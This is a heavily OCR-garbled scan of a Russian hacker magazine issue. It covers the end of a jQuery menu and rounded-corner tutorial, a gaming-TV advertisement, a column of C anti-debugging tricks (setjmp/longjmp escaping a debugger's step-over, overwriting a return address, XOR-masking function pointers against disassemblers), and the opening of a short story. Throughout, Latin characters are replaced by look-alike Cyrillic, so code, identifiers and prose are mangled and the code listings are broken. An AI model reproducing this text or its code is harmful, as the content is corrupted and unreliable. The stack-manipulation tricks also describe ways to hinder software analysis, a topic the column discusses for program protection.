$ ( " а [@кгеб$ = " + сіоситепк . 
Іосакіоп.ракЬпате + " ] " ) . 
сзз ( { бопШеідЬк : "Ьоісі" }) 

При изменении формата ссылок (я исполь- 
зовал относительные пути) необходимо 
будет поменять и скрипт. Что касается одной 
строчки, которая делает всю работу, то в ней 
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> Круглые уголки 



задействуется уже знакомая нам функция $(...), 
которая в данном случае выбираетвсе ссылки 
со значением атрибута ЬгеТ заканчивающе- 
гося на боситепиосабоп.раШпате. В этой 
переменной, в свою очередь, хранится путь до 
текущей страницы. Также мы используем метод 
С55 для установки параметра каскадныхтаблиц 
стилей іюпі-ѵѵеідЫ. Если ты обратил внимание, 
то название параметра іюпі-ѵѵеідЫ написано 
немного по-другому: «{опіѴѴеідЫ:», то есть 
стилем «верблюд», который используется в 
іаѵаЭсгірІ:. В качестве завершающего штриха я 
предлагаю сделатьтак, чтобы клик по элементу 
менютекущего раздела отменялся. Это очень 
разумное решение, ведь нельзя перейти на 
страницу, на которой уже находишься. А еще 
мне удастся продемонстрировать цепочку 
вызовов, которые постоянно используются в 
скриптах с]0иегу: 

ЦЕП0ЧКАВЫ30В0В 

МѴА5СКІРТ 

$ (сіоситепД ) . геасіу ( іипскіоп ( ) { 

$ ( " а [@ЬгеТ$= " + сіоситепк . 

Іосакіоп . раДкпате + "] ") 

. сзз ( { іопШеідіЩ : "Ьоісі"}) 

. сііск ( іипскіоп ( ) { гекигп іаізе; 

} ) ; 

}) ; 

У нас получилось обойтись без дополнительных 
переменных, что в простых случаях сокращает 
код без ущерба для ясности. В этом исходнике 
ты можешь также увидеть стиль оформления, 
который удачно подойдет в следующем случае: 
вместо одной строчки я бью цепочку вызовов на 
несколько, чтобы показать, где вызовы происходят. 
Я думаю, чтотеперьтебе не составиттруда изме- 
нитьскриптдля прикрепления стрелочки только к 
внешним ссылкам. Очень рекомендую посмотреть 
для простоты, какие операторы эквивалентности 
есть, кроме «$=», и что именно они делают. 



□ Горизонтальное меню 

Теперь рассмотрим еще один пример, в котором 
верстка уже немного переплетается с програм- 
мированием. Создадим горизонтальное меню 
с эффектом выделения квадратными скобками 
элемента, на который наведен указатель « № 
устройства графического ввода типа "мышь"» :]. 
В отличие от предыдущего случая, давай 
поставим ограничение, чтобы квадратными 
скобками не выделялись никакие другие ссыл- 
ки, кроме элементов меню. Для этого присвоим 
списку класс, по которому будем производить 
отбор: 

ГОРИЗОНТАЛЬНОЕ МЕНЮ — СПИСОКС 
КЛАССОМ МЕІѴІІІ 

НТМІ_ 

<и1 с1азз= "тегш" > 

<1іха ]ггеТ= " /тегш . 
іЩтІ " >Главнаж/ах/1і> 

<1іха ]ггеТ= " /агкісіез . 

Ысті " >Статьи</ах/1і> 

<1іха ЬгеТ= " /Тогиш. 

Ысгпі " >Форум</ах/1і> 

<1іха Ъ.геі= " /Ііпкз . 

Ь.кт.1 " >Ссылки< / ах / 1 і > 

<1іха кгеТ= " /аЬоик . Ысші " >0 
нас</ах/1і> 

</и1> 

Чтобы сделать меню горизонтальным, восполь- 
зуемся С55: 

ГОРИЗОНТАЛЬНЫЙ СПИСОК 

С55 

и 1. тегш 1і { сіізріау: іпііпе; } 

Для нужного эффекта нам необходимо найти все 
ссылки в списках, у которых проставлен класс 
гшепи. На языке С55 это будет обозначаться так: 
«иі.тепи а». К ссылке с одной стороны надо 
добавить открывающуюся скобку, а с другой 



— закрывающуюся. Событие, которое происхо- 
дитпри наведении курсора мышки, называется 
Ьоѵег. Ему передаются две функции: первая 
срабатывает при наведении курсора, вторая 

— при выходе курсора из области элемента. 

СКРИПТ ДЛЯ ДОБАВЛЕНИЯ И УДАЛЕНИЯ 

КВАДРАТНЫХ СКОБОК 

МѴА5СВІРТ 

$ (сіоситепк ). геасіу ( іипскіоп ( ) { 

$ ( " иі . тегш а " ) . Ъоѵег ( 
іипскіоп ( ) { 

$ (Ыгіз) .ргерепсН " [ " ) ; 

$ ( Ыгі з ) . аррепсі ("]"); 

}, 

іипскіоп ( ) { 

ѵаг з = $ ( Ыгі з ) . Ь.Дт.1 ( ) ; 

$ (Ыгіз) . іЩтІ (з . зиЬзкг (1 , 
з . 1епдкЪ-2 ) ) ; 

}) 

}) ; 

Несколько пояснений относительно 
второй функции. Метод ЫтЦ) возвращает 
(или устанавливает, если есть параметр) 
содержимое элемента в виде строки. Метод 
зиЬзІт строкового класса возвращает 
часть строки указанной длины, начиная с 
указанного номера. То есть в этой функции 
я просто беру часть строки, начиная с пер- 
вого символа и заканчивая предпослед- 
ним. Выпадают символы скобок — нулевой 
и последний. 

□ Круглые уголочки 

В качестве завершения темы верстки 
с использованием ІОиегу я покажу, как 
использовать этот фреймворк для создания 
круглых (или скругленных) уголков. Эта 
тенденция стала своеобразным фетишем 
у современных веб-мастеров. Как можно 
сделать кругленькие уголки? Умудренный 
жизнью верстальщик ответиттебе примерно 
следующее: 

КРУГЛ Ы Е У ГО Л КИ : ТРАД И ЦИ О Н Н Ы Й 
ВАРИАНТ 

НТМІ_ 

ссііѵ с1азз="с1"> 
ссііѵ с1азз="М"> 
ссііѵ с1азз=" с" х/сііѵ> 

</с1іѵ> 

ссііѵ с1азз= "Ьсі" > 

ссііѵ с1азз=" с"> 

ссііѵ с1азз= " з " > 

с — Здесь идет контент --> 

с/сііѵ> 
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КѴМ Бѵѵіісіі 



Интерфейсный кабель 




Удаленный ѵѵеЬ- доступ 
по ИИр 



</<ЗІѴ> 

</с!ІѴ> 

<с!іѵ с1азз= " 6Ц " > 

<с!іѵ с1азз=" с" ></с!іѵ> 

</с!іѵ> 

< /сЗ. іѵ> 

Плюс к этому еще и С55, а про картинки я вообще молчу. Но кто-то говорил 
отом, что надо отделять контент (НТМИ) от оформления (С55)? Отлично, 
идеальный выход — следующий код: 

КРУГЛЫЕ УГОЛКИ: 

ИДЕАЛЬНЫЙ ВАРИАНТ 

НТМІ_ 

<сііѵ с1азз= " гоипсі" > 

<-- Здесь идет контент --> 

</<Зіѵ> 

Конечно, мыживем не в идеальном мире... Хотя почему? Давай заставим этот 
код работать! Нам понадобится плагин іОиегусогпег; который отвечает за 
создание различных видов углов. Для этого надо скачать фа йліциегу.согпег. 

І5 (адреса смотри в конце статьи, а исходники будут на диске кжурналу).Файл 
веситб Кб в несжатом видес комментариями итестами.Теперьпереборем 
себя и напишем целую строчку кода в конструкции $(боситепі).геабу: 

СКРУГЛЯЕМ УГЛЫ 
МѴА5СШРТ 

$ ( ' . гоипсі 1 ) . согпег ( ) ; 

Для красоты (а точнее, чтобы результат работы был виден) зададим цвет и 
внутренние отступы для СЛОЯ: 

СТИЛЬ РОУМО 

С55 

.гоипсі { 



расісііпд: 2 0рх; 

Ьаскдгоипсі-соіог : дгееп; 

} 

Сразу скажу, что полезность плагина только круглыми уголками не огра- 
ничивается. Ты можешь создавать нетолько круглые, но и треугольные, 
«покусанные» уголки, а также уголки многих других форм. Крометого, 
можно определять, какие именноуглы подвергнутся декоративному укра- 
шению, задавать другие параметры для метода согпег. 

□ Выводы верстальщика 

Мечтой парней из ѴѴЗС всегда было максимально возможное разделение 
контента и его представления. Большую роль в этом играют каскадные 
таблицы стилей, но функционала этого стандарта не хватает для разнооб- 
разных нужд верстки. Поэтому приходится прибегать к ЗаѵаЗсгірІ;, который 
недо конца адаптирован к подобным задачам. Исправить эту ситуацию 
можно с использованием фреймворка іОиегу, который позволяет находить 
различные элементы веб-странички с помощью функции $(...). Сточки 
зрения верстальщика, іОиегу действует кактаблица стилей с расширен- 
ными возможностями. 

ООиІго 

Я всегда был ленивым (и поэтому хорошим :]] программистом. Я 
искал более простые действия для совершения того или иного, 
пытался автоматизировать в своей деятельности все что возмож- 
но и старался не изобретать велосипедов, а брать готовое. При 
разработке на .ІаѵаБсгірі можно обойтись без всяких фреймворков 
и библиотек, но такая работа займет много времени, которое уйдет 
на программирование рутинных операций и увеличит общий объем 
кода. Крометого, программист вряд ли сможет один написать дейс- 
твительно качественный и продуманный набор базовых функций, как 
это сделано в іОиегу. 

Если ты сомневаешься, советую провести эксперимент: напиши одно и 
тоже приложение сначала без іОиегу, а потом с его использованием. И, 
что называется, «почувствуй разницу». ШИ 
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Вирту сЭ/\ИТИ 






ТЕРРИТОРИЯ 

ГЕЙМЕРОВ 

НАМТѴ 



сразу три 

игровых телепроекта! 



ВИРТУАЛИТИ 

По пятницам в 18:30 
и по субботам в 12:30 

Реально о виртуальном. Все 
самое новое и интересное 
в мире игровой индустрии. 
Превью новинок, обзоры 
актуальных хитов, геймерский 
хит-парад, секреты 
прохождений... 



Х-РЬАУ 

По воскресеньям в 12:30 
и по вторникам в 18:30 

Об играх жестко и без прикрас. 
Ведущие не жалеют даже 
самые громкие проекты, 
но всегда - со знанием дела. 



* «Виртуалити» и «Икона видеоигр» 
чередуются в эфире. 



ИКОНА ВИДЕОИГР 

По пятницам в 18:30 
и по субботам в 12:30 * 

Энциклопедия легендарных 
игр. Каждая программа 
посвящена одной игре. 
Истории создания, успеха, 
а также разоблачение 
тайн разработчиков... 







^ согііпд 




ТРЮКИ 
ОТ КРЫСА 




Сегодняшний выпуск «Трюков» всецело посвящен хитроумным приемам програм- 
мирования, затрудняющим дизассемблирование и отладку откомпилированной 
программы и, следовательно, увеличивающим ее сопротивляемость взлому. 
Причем все это — без всякого ассемблера и других шаманских ритуалов! 



01 





Сладкая парочка геііитр 
и Іопдіитр 



Трассировка программы без захода в функ- 
ции (зіер-оѵег) — основной способхакерской 
навигации. На пути его реализации разра- 
ботчики защитных механизмов стремятся 
расположить всякие подводные рифы и 
другие неожиданные ловушки, типа функ- 
ций, никогда не возвращающихуправление 
в точку возврата, что приводит к потере 
контроля над отлаживаемой программой 
и сильно напрягает хакера, заставляя его 
входить в каждую функцию, а также во все 
вызываемые ею функции. При большом 
уровне вложенности взлом растягивается на 
многие часы, дни, недели, месяцы, годы... 
Самый простой (и легальный) способ обхода 
точки возврата основан на использова- 
нии стандартных Си-функций зе^итр и 
Іопдщтр. Первая запоминает состояние 
стека функции в переменной ти па ітр_ЬиІ 
(включая адрес текущей выполняющейся 
инструкции). Вторая передаетуправление 
по этому адресу вместе с аргументом типа іпі, 
что создаетбезграничный простор для вся- 
кого рода трюкачества, наглядный пример 
которого приведен ниже: 

ОБХОД ТОЧКИ ВОЗВРАТАЧЕРЕЗ І_ОМОЛЧР 

#іпс1исіе <зСс!іо.]т> 

#іпс1исіе <зеСзшр.]т> 

#іпсіис1е <зСс11іЬ.Ъ.> 

ІІтр_Ьиі: зСаск_зкаке; 

А ( ) {ргіпСС ( " Сипе А ( ) \п" ) ; 

Іопдзтр ( зСаск_зСаСе , — 1 ) ; } 

В ( ) {ргіпкб ( " Сипе В ( ) \п" ) ; 

Іопд^тр ( зкаск_зСаке , — 2 );} 



I 



' ) {ргіпкб ( " Сипе С ( ) \п" ) ; 

Іопдзтр ( зкаск_зкаЦе , — 3 ) ; } 

таіп ( ) 

{ 

іпС :)тргек; 

// азт{іпк 03}; // для отладки 

// запоминаем состояние стека 
:)тргек = зеС^тр (зЦаск_зСаке) ; 

/ / выполняем С ( ) , из которой мы 
возвращаемся в точку :)тргек 

i 0 (зтргек==-3) геСигп 0 ; 

// выполняем С() , из которой мы 
возвращаемся в точку ^тргеС 
ІО (зтргек = = -2 ) СО; 

/ / выполняем В ( ) , из которой мы 
возвращаемся в точку :)тргек 

ii (зшргек = = -1) ВО; 

/ / выполняем А () , из которой мы 
возвращаемся в точку :)тргек 
ІО ( зтргеО = = 00 ) АО; 

// эта функция никогда не полу- 
чает управление 

ргіпОО ( "доосі Ьуе , ѵгогІсП \п" ) ; 

} 

Откомпилируем программу и убедимся, что 
она последовательно вызывает функции 
А(), В () , С () , после чего раскомментируем 
строку «_азт{іпІ 03}», откомпилируем еще 
раз и запустим полученный ехе-файл под 
отладчиком ОЦуйЬд (или любым другим), 
нажав <Р9> (гип) для достижения строки 
«іпі ОЗЬ». Начинаемтрассировать програм- 
му по <Р8> (зіер оѵег) и... Не доходя до строки 



«ргіпЙ(«дооб Ьуе, ѵѵогіеі !\п») ;» и не успев вы- 
полнить функцию А(), отладчик неожиданно 
теряет контрольза подопытной программой, 
и она, вырвавшись из-под трассировки, 
благополучно завершается по геіигп 0, что 
ОНуОЬд и констатирует. Сказанное относится 
не только к ОНуОЬд, но также кЗоНІСЕ и всем 
остальным отладчикам. 

| Ксожалению, в дизассемблеретипа ЮАРго 
ловушка становится слишком очевидной, 
и, установивточку останова на функцию 
зе^ппр, хакер без труда сможет отладить за- 
щищенную программу, разобрав защитный 
механизм на составные части и выкинув из 
него все лишние детали. 






02І 



Подмена адреса возврата 



При трассировке зіер-оѵег отладчики уста- 
навливают программную (реже аппаратную) 
точку возврата за концом команды САНЬ 
}ипс_А, куда }ипс_А возвращаетуправление 
посредством оператора геіигп, стягивающе- 
го со стека адрес возврата, положенный туда 
процессором перед вызовом }ипс_А. Таким 
образом, чтобы вырваться из-под трасси- 
ровки, нам достаточно заменить подлинный 
адрес возврата адресом какой-нибудь дру- 
гой функции (назовем ее функцией }ипс_В), 
куда и будет переданоуправление. 

Проблема втом, что положение адреса 
возврата в стеке нельзя узнать штатными 
средствами языка Си, а если задействовать 
нелегальные средства, то это уже будет не 
трюк, а хак.то есть грязный прием програм- 
мирования, работающий не на всех плат- 
формах и зависящий от компилятора. Но все 
же кое-какие зацепки у нас есть. Мы знаем, 
что стек растет снизу вверх (то есть из 
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области старших адресов в область млад- 
ших). Также мы знаем, что, по Си-соглаше- 
нию, аргументы функции заносятся в стек 
справа налево, после чего туда заносится 
адрес возврата, и между последним аргу- 
ментом и адресом возврата компилятор не 
имеет права класть ничего другого. 

В противном случае функция просто не 
сможет найти свои аргументы. А поскольку 
программист имеет право использовать 
функции, откомпилированные разными 
компиляторами, то компилятору ничего не 
остается, кроме какследовать соглашениям. 
Таким образом, нам надо просто получить 
адрес самоголевого аргумента (что можно 
сделать оператором «&»). Преобразовав 
его куказателю на машинное слово (на х86 
составляющее 32 бита и совпадающее по 
размеру с указателем на ті), уменьшить его 
на единицу и... записать по этому адресу ука- 
затель на функцию }ипс_В, куда и будет пе- 
редано управление по завершении }ипс_А. 
Следует помнить, что при выходе из функции 
}ипс_В управление будет передано... обратно 
на саму функцию }ипс_В! Почему? Да потому, 
что она вызвана «нечестным» способом и 
в стек не занесен адрес возврата. Тем не 
менее, іипс_В можетспокойно вызывать 
остальные функции «честным» путем, ничем 
не рискуя. 

Законченный пример приведен ниже: 

ДЕМОНСТРАЦИЯ ВЫЗОВА ФУНКЦИИ С 
ПОДМЕНОЙ АДРЕСА ВОЗВРАТА 

// функция В ( ) , которой функция А ( ) 
// скрытно передает управление 
В ( ) {ргіпРТ ( " Типе В(); \п" ) ; 
ехіТ ( 0 ) ; } 



/* явно объявляем функцию как 
_сбес1, чтобы оптимизатор «случай- 
но» не реализовал ее как Тазбсаіі 
*/ 

_сбес1 А ( іпТ х) 

{ 

// подмена адреса возврата 
* ( ( ( ( іпТ* ) &х) -1) ) =х; 



Компилируем программу, убеждаемся, что 
она работает, затем раскомментируем строку 
Н «_а5т{іпі 03}», перекомпилируем и запус- 
^0 каем под отладчиком Місгозоб ѴізиаІЗШсІіо 
ОеЬиддег (или любым другим). Нажимаем 
<Р5> (гип) и затем несколько раз <Р10> Ыер 
оѵег). Отладчик входит в функцию А(), но 
обратноуже не возвращается, поскольку 
отлаживаемая программа вырывается излап 



трассировщика 



03 



Маскировка указателей 



ргіпТТ ( ©Типе А ( ) ; \п@) ; 



таіп ( ) 

{ 

// азт{іпТ 03}; // для отладки 




Описанный выше прием эффективен в борь- 
бе против отладчиков, но бессилен перед 
дизассемблерами, поскольку при первом же 
взгляде на вызов функции !ипс_А становится 
заметно, что ей в качестве аргумента пере- 
дается адрес функции ішпс_В. «Это же явно 
неспроста», — бормочет себе под нос хакер, 
устанавливая точку останова на }ипс_В, о ко- 
торую спотыкается защитный механизм при 
попытке освободиться от гнета отладчика. 

ТАКВЫГЛЯДИТ ОТКОМПИЛИРОВАННЫЙ 
КОД В ДИЗАССЕМБЛЕРЕ 

; Тгар До БеЪиддег 
. бехб : 0040103Р іпб 3 
. бехб : 00401040 ризб оІІзеВ 1ипс_В 
. бехб : 00401045 саіі 1ипс_А 
. бехб : 0040104А абб езр, 4 
. ВехВ : 0040104Б ризб оІІзеР 
аСообВуеШогІб ; "дообЬуе, ѵ\гог1б’\ 
п" 

. бехб : 00401052 саіі _ргіпб1 

Проблема решается легкой ретушью 
защитного механизма. Достаточно слегка 
зашифровать указатель на }ипс_В, чтобы 
он не так бросался в глаза, и... хакер 
ни за что не догадается, где зарыта 
собака, пока не проанализирует весь код 
целиком. А анализ всего кода програм- 
мы — дело сложное и отнимающее уйму 
времени. 






/ 
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ШЖ І I 

Самое простое, что можно сделать, — перед 
передачей указателя на }ипс_В наложить 
на него «магическое слово» операцией 
ХОР, а перед подменой адреса возврата 
наложитьХОР еще раз, получая исходный 
указатель: 

ДОРАБОТАННЫЙ ВАРИАНТ, МАСКИРУЮ- 
ЩИЙ УКАЗАТЕЛЬ НА РОМС_В 

#бе!іпе МАСІС_ШКЬБ 0x66699 9 

* ( ( ( ( іпб* ) &х) -1) ) — х А МАСІС_ 
ШКЬВ ; 





А ( ( ( іпб ) В) А МАСІС_ШКЬБ) ; 






Компилируем программу, не забыв задейс- 
твовать оптимизацию, чтобы компилятор 
зашифровал указатель еще на стадии 
компиляции; в МісгозоЙ Ѵізііаі С++ это 
достигается путем указания ключа /Ох’ , 
в других компиляторах это может быть 
ключ '-02' или что-то другое, описанное в 
справочном руководстве. 

ДОРАБОТАННЫЙ КОД 
В ДИЗАССЕМБЛЕРЕ 

бехб : 00401040 _шаіп ргос пеаг 

бехб : 00401040 ризб 2679996 

бехб : 00401045 саіі зиЬ_401020 
бехб : 0040104А ризб оИзеб 
аСообВуеШогІб ; "дообЬуе, 
ѵгогіб! \п" 

бехб : 0040104Р саіі _ргіпб1 
бехб : 00401054 аббезр, 8 
бехб : 00401057 гебп 
бехб : 00401057 _таіп 

Теперьуказатель на функцию }ипс_В пре- 
вратился в безликую константу 2679996, 
в которой даже самые проницательные 
хакеры навряд ли смогут распознать 
ее истинную сущность! Кстати говоря, 
описанный трюк не только полезен в 
контексте подмены адреса возврата, но и 
применим ко всем видам указателей — как 
на функции, так и на данные, в том числе и 
текстовые строки, перекрестные ссылки к 
которым автоматически генерируются 
ЮА Рго и другими дизассемблерами. 

А по перекрестным ссылкам найти код, 
выводящий сообщение о неверном ключе 
регистрации или истечении демонстраци- 
онного строка использования, — минутное 
дело! Если, конечно, указатели не будут 
зашифрованы магическим словом! ІЗЕ 
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ЫІВО 

/ N I ПО@ПЕАІ_. ХАКЕР. ІШ / 



Единственная 

попытка 



то был очень необычный человек. 

Со своими странностями. Со сво- 
_ I и ми, та к сказать, та рака на ми в голо- 
ве. Я был знаком с ним втечение... В 
© течение пяти лет. Мы ходили в одну школу — он 

приехал с родителями, когда я учился в шестом 
классе. Его отца перевели служить в одну из 
частей нашего городка, и они со всей семьей, а у 
него была еще маленькая сестричка, переехали 
в наше захолустье. 

Мы подружились не сразу. Как и всякий новень- 
кий, он долго приглядывался кнам, кнашему 
классу, стараясь понять, кто окажется ему 
ближе. Пара мальчишек, с которыми он сошелся 
довольно быстро, на поверку оказались какими- 
то дебилами, после этого знакомства он стал 
осторожнее и внимательнее. Это, кстати, сразу 
обнаружило в нем неординарныйтип мышле- 
ния — несмотря на юный возраст, а намтогда 
было по двенадцать-тринадцать лет, он был 
чертовски логичен, взвешивал каждое слово и 
движение, все его поступки отдавали какой-то 
взрослостью. 

Позднее мы узнали отом, что отецу него не 
просто офицер, а военный программист. То, что 
поблизости от нашего городка базировались 
какие-то таинственные «космические войска», 
которые мы называли не иначе как«комичес- 
кие», в общем-то, тайной не являлось. То, что 
им нужны подобные специалисты, тоже было 
вещью логичной. 

Мишка... А я разве не сказал? Да, имя его 
— Михаил. Так вот, заинструктирован отцом он 
был насмерть. По части военной тайны. Может, 
за страх, а может, за совесть, но молчал он, как 
партизан. Нет, не совсем молчал, не подумайте 
чего. И не делайте из него идиота. Он оказался 
все-таки достаточно общительным... Для чего 
достаточно? Для то го, чтобы я разглядел в нем 
интересного человека и захотел с ним дружить. 
Была в нем на тот моменттолько одна стран- 
ность, которую принять мы, мальчишки, ну никак 
не могли. Он был освобожден от физкультуры. 
Совсем. Он неходил на нее никогда. Ни при 
каких обстоятельствах. Это было известно с 
первого же дня, когда он с мамой пришел кнам 
в класс. Они о чем-то пошушукались с классной 
руководительницей у доски, потом усадили 
Мишку с Нонной за третью парту, сами продол- 



жили, а спустя пару минутушли кдиректору. 
Воттогда кто-то его и спросил — совершенно не- 
ожиданно: «Ты за кого болеешь, за ЦСКА?» Как 
будто ничего важнее на свете нет! А он вздрог- 
нул, повернулся и ответил: «Я — за «Зенит». 
Смотреть нравится. ..»«А играть?» — продолжи- 
ли его пытать пацаны. Воттогда он и ответил: «А 
играть — мне не судьба. У меня отфизкультуры 
освобождение. Навсегда...» 

Как-то незаметно я сблизился с ним. Начал бы- 
вать в него в гостях. К себе-то пригласить язык не 
поворачивался — дома были еще четверо бра- 
тьев, бардак несусветный, все по потолку ходят, 
визг, крики... Увидел отца в военной форме, его 
фотографии в шкафу — отецза какими-то стран- 
ными компьютерами размером с человека, ато 
и больше... Стало интересно, начал спрашивать. 
Мишка поначалу отмалчивался, отшучивался, 
но в какой-то момент понял, что наша дружба 
позволяет поделиться тайной. И он поделился. 
Отец его оказался оченьбольшой шишкой. 
Очень. Правда, званиетогда у него было, кажет- 
ся, капитанское, но дослужился он до подпол- 
ковника, при его должности это был «потолок». Я 
помню, как Мишка приходил в класс счастливый 
и рассказывал, что мама вчера цепляла отцу на 
погоны новые звезды... 

Мне остается только догадываться, что такое 
мог проектировать и программировать Мишкин 
отец. «Космические войска» — звучит, действи- 
тельно, смешно, учитывая реалии современ- 
ности. Наверное, он работал над какими-нибудь 
устройствами слежения за спутниками, а может, 
изобретал скафандры и рассчитывал что-ни- 
будь из области суперматериалов... А может, 
он проложил курс нашим кораблям на Марс 
или еще куда — неисповедимы пути Господни, 
а уж во Вселенной — и подавно. Соблюдать 
режим секретности в их части умели — стоит 
отдать должное. Обычно в округе все, до самой 
последней собаки, знаютотом, что происходит 
за высоким кирпичным забором. Здесь все было 
нетак. Все было по-взрослому. 

Но отецсделал самое главное — он привил 
сыну любовь к компьютерам. Причем не как 
взрослые-неудачники, которые посредством 
детей реализуютсвои невоплощенныеамбиции, 
заставляя их заниматься теми делами, для кото- 
рыху них самих в школьном возрасте не хватило 



способностей. Далеко нетак. Мишка занимался 
программированиемтакже, каки отец, — забы- 
вая обо всем. Уже в девятом классе он выиграл 
какую-то городскую олимпиаду по информатике, 
его рекомендовали на областные соревнования 

— он и там был первым. Нельзя сказать, что его 
интересовали все эти призы, поездки и слава 

— он просто рос послушным и исполнительным. 
Просили ехать — ехал, надо было участвовать 

— участвовал. Атак как он умел делатьто, что он 
делал, оченьхорошо, первые места были ему 
обеспечены. 

Пожалуй, на весь наш класс набралосьбы че- 
ловек пять-шесть, у кого дома был компьютер. В 
основном в школеучилисьдети военных, а дохо- 
ды их оставляли желать лучшего, даже несмотря 
на режимы боевой готовности и секретности, за 
которые доплачивали довольно хорошо. Поэтому 
компьютерная грамотность была у нас далеко 
не на высоте, этакие, как Мишка, казались нам 
людьми из какого-то неведомого, таинственного 
мира, эдакими пришельцами... 

Незнаю, какдругие, а я Мишкууважал. Сообра- 
жал он в компьютерах прилично. Апосколькуу 
его отца по долгу службы дома был телефон, то 
и с интернетом я познакомился тоже благодаря 
своему другу. Впервыеувидел, услышал, попро- 
бовал своими руками... Мы с Мишкой даже хо- 
тели создать сайт нашего класса, выложитьтам 
какие-нибудь фотографии, истории изжизни. И 
он поначалу загорелся этой идеей, но потом сам 
же посмеялся над нашей с ним самонадеяннос- 
тью и объяснил, что, кроме нас, этот сайт никому 
не будет нужен, что все это идиотское самолюбо- 
вание и не более того. 

И еще он добавил, что заниматься надо «более 
серьезными вещами»... Что? Да, именнотакон 
и сказал, сидя за компьютером. Я хорошо помню 
тот день, потому что Мишка произнес эти слова 

— и его будто подменили, один раз и навсегда, 
до самой... 

Я тогда не понял, что он имел в виду. Куда мне 
было до него! Он сидел за компьютером, смотрел 
сквозьэкран и видел какие-то необозримые 
дали, ставил себе какие-то загадочные, великие 
цели. Мне бытогда повнимательнее отнестись к 
его словам... Но я продолжал восприниматьего 
как человека с другой планеты, заглядывал ему 
в рот во всем, что касалось компьютеров, интер- 



/ 133 



ХАКЕР 04 /100/ 07 





^ креатив 



нета и загадочного слова «ассемблер» и еще 
несколькихтакихже — красивых и непонятных. 
Помните, я в самом начале сказал, что он был 
освобожден от физкультуры? Его мама отнесла 
школьной медсестре справку, та прочитала, 
приподняла брови и сочувственно покачала 
головой. Мы подглядывали — я и еще несколько 
мальчишек— и нам быложутко интересно, в 
чемжетам дел о. Узнать тогда ничего неудалось, 
впрочем, каки потом. Сам Мишка неотвечал ни 
на прямые вопросы, ни на любые другие попыт- 
ки вызвать его на откровенность. Отмалчивал- 
ся, переводил разговор на другиетемы... 

Но при этом он всегда ходил со всеми на 
физкультуру. Зимой он сидел в спортзале на 
скамейке, весной и осенью, когда уже было 
тепло и школьный стадион покрывался травой, 
он бродил вдольтурников, повесив на один 
из них свой портфель, смотрел, какдевчонки 
бегают кросс и как мальчишки играют в футбол. 
Мызвали его ксебе, махали руками, смеялись... 
Иногда он забываясьухитрялся ударить по 
отскочившему мячу, но потом у него был такое 
виноватое выражение лица, что мы даже 
пугались. Чертовщина какая-то! Это же как надо 
болеть, чтобы бояться стукнуть по мячу! 

Нет, мы незнали ничего. И неузнали. Все 
было по-честному. Врачебнаятайна и все 
такое. Не поверите, ноонжилтак, что недавал 
возможности даже заподозрить хоть что-ни- 
будь, предложить хоть какую-то версию. Было, 
безусловно, понятно, что парень чем-то болен, 
но чем? Голова, позвоночник, суставы, сердце... 
Да мало ли что еще! 

Одно могу сказатьточно, я видел, что он жутко 
завидует нам. Тем, кого он считал здоровыми и 
полноценными людьми. Один раз он обронил 
эту мысль — насчет неполноценности — в 
разговоресо мной, я запомнил ее надолго, 
понимая, что не в силах изменить ни его жизнь, 
ни отношение кней. 

Нам тогда было по шестнадцать, а он казался 
нам всем старше. Даже не знаю, за счет чего... 
Взгляд серьезный, взрослый не по годам; о 
чем-то все время думал, частенько можно было 
увидеть в его черновиках какие-то строчки, лич- 
но для меня являющиеся китайской грамотой. 
Каким-то шестым чувством я понимал, что это 
обрывки программ, которые пишет Мишка, и от 
этого мое уважение к нему росло. Я спрашивал, 
что это, и он особо не скрывал — объяснял, что 
изучает язык программирования, что хочет 
быть какотец, что ничего интереснееассем- 
блера не существует, что еще пара лет — и он 
будет поступать в военноеучилище суклоном в 
информационные технологи и... А я кивал, а сам 
думал, куда жежизньзакинетменя — человека, 
далекого от всего этого... 
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Не скажу, что моя жизнь не удалась — причем 
во многом благодаря Мишке. То, что я сделал 
из себя, — это дань, отданная моему другу. Моя 
профессия, моя жизнь — вседля него... Ноя 
отвлекся. 

Постепенно я подхожу ктому, о чем хотел рас- 
сказать. Все это случилось весной, последней 
школьной весной. Мишка стал много времени 
проводитьдома за компьютером, прекратил 
появляться на занятиях физкультурой, которые 
по-своему любил... Я заходил к нему пару раз 

— он любезно встречал меня, его мама угощала 
нас чаем с конфетами (знаете, однажды я 
принес в портфеле пару бутылок пива, но Мишка 
увидел их и сразу же замахал руками, заставил 
убрать назад; я так и не понял, что он хотел этим 
сказать, но подумал, что это связано всестемже 
загадочным освобождением от физкультуры)... 
Мы трепались ни о чем, но по состоянию Мишки 
было видно, что я сильно отвлекаю его от чего-то 
очень важного. 

В такие моменты я чувствовал себя жутко нелов- 
ко и побыстрее сворачивал нашу с ним беседу. И 
каждый раз, уходя, я бросал взгляд в его комнату, 
где стоял компьютер. На столе лежали какие-то 
чертежи, это я точно помню, несколько толстых 
книжек... Да, еще очень неожиданная вещь 

— паяльник. Неожиданная потому, что я никогда 
не замечал за Мишкой страсти к радиоделу. А что 
еще может бытьу человека, хорошознакомого с 
компьютерами? 

Спрашивать было бесполезно. Один раз я не 
удержался, задал вопрос.. Больше дверь в ком- 
нату к Мишке открытой я не видел. 

Он продолжал ходить в школу, готовился к 
выпускным экзаменам, не делал тайны из того, 
что собирается поступать в какую-то сверхсек- 
ретную военную академию, куда уже написал 
протекцию командир части, где служил отец, и 
директор их школы. Это стало известно после 
очередного родительского собрания, на котором 
мамы и папы делились своими планами насчет 
будущего их детей. 

Помню, моя мать пришла тогда, села на кухне, 
подперла голову руками и задумалась. Я спросил 
что-то насчет здоровья, насчет работы... Она 
посмотрела на меня и сказала: 

«Воту всех дети какдети... Поступают куда-то, о 
чем-то думают. Аты?» — «А что я?» — «Что... Вот 
Михаил чего-то хочет отэтой жизни, готовится 
к поступлению, из-за компьютера не встает... И 
ведь поступит, я уверена; и те письма, что за него 
написали, совсем тут будут не при чем...» 

Она помолчала, а потом добавила: «Хотя... 
Военная академия... Какой думает физкультуру 
сдавать? Ведь столько лете освобождением. Ну 
да боге ним». Она встала и пошла готовить ужин. 
А я задумался, потому что мать была права — не- 



льзя поступить в военноеучилище, не выполнив 
нормативов по физкультуре. Они там бегают, 
подтягиваются... Еще что-то делают, я не в курсе. 
Помню, тогда мне стало действительно любо- 
пытно, как Мишка собирается преодолевать это, 
в сущности, непреодолимое препятствие. Мож- 
но было, конечно, предположить, что родители 
его готовы и денегзаплатить, и использовать 
все свои связи и положение отца, но ведьэто 
все-таки армия! Обязательно найдется кто-ни- 
будь, кому не понравится офицер, не занима- 
ющийся физкультурой, неходящий в наряды 
и вообще всячески избегающий физического 
